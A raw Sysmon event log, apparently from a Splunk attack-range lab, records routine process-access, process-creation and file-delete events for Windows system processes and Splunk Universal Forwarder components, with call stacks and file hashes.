11:28:48.997{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223479Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.997{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223478Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.997{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223477Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.997{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223476Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.997{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223475Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.997{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1A70-6216-6705-000000003902}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223474Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.997{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A70-6216-6705-000000003902}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223473Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.998{4F8D34B0-1A70-6216-6705-000000003902}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223503Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:50.920{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D293D89C5B0AB8B8E8B117CD9112C3C7,SHA256=52705A70B6459E2829A010C856FCBE7832E291CA1E89BDF33972BDC7976DC471,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:50.388{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B44C8C96FB27DE50D95AA58433B95EA,SHA256=4AE8E8081EACA7DFB37E9866F8BBEF0E9819138312411FE721BA7DB4F4BFF717,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223502Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:50.170{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=917B86030FAD7C30BE2BE7A499E3CFE5,SHA256=E92FB167F5634BB0336D643F6F3134DCE093FC3DC42C3DE48491BF02919E5FCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223501Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:50.170{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E3E21DDE581A883AC574B14BF269163,SHA256=9479DFDF014D178BDF7F5C12CD88AA4793E1FD938FD1B6D8DBF88AF119E8AE93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223517Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.983{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB4FFEB2CAD18EA75493BA1F2D223D96,SHA256=CD8E5A316C58F9517C5F098DAE1EAB7A35A51DA0096D413774977E2CCDEB8C26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:51.403{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35DA6A7D6642FA383D67AE1492720728,SHA256=30C4228F5AE9D9F039AD4E906641DAB5305FE11B2768A873219B2A05510485C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223516Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.295{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A73-6216-6905-000000003902}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223515Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.295{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223514Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.295{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223513Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.295{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223512Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.295{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223511Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.295{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223510Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.295{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223509Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.295{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223508Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.295{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223507Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.295{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223506Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.295{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1A73-6216-6905-000000003902}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223505Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.295{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A73-6216-6905-000000003902}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223504Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:51.296{4F8D34B0-1A73-6216-6905-000000003902}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223519Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:52.984{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C323A0C519904ECE96ACB9ADD9A6ADF,SHA256=B9D18683029F9615BF4F6DC7612A277F658DF120253789828A8D972B4CC1E15B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:52.418{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07180CC050B4D000329A3A4C68CAC151,SHA256=A52B8795733EAF5C5556EC4A9AA589DC38C0B6F85094950FE3EAAD22B2E8308C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223518Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:52.436{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E69B712CCEA8CF688056E1487AE22CDD,SHA256=FBC745BEA6DA4857D99234A7AA8CBA5B757C15DD71A6D491EDC6FC941DBE1FCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223521Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:53.984{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7D56F5D10EB95B283F13206DE21EB32,SHA256=CEA5A39B5CE49E6811CFDDED14D9A6FAF7752C355B27ADACEB7BF99E81620958,IMPHASH=00000000000000000000000000000000falsetrue 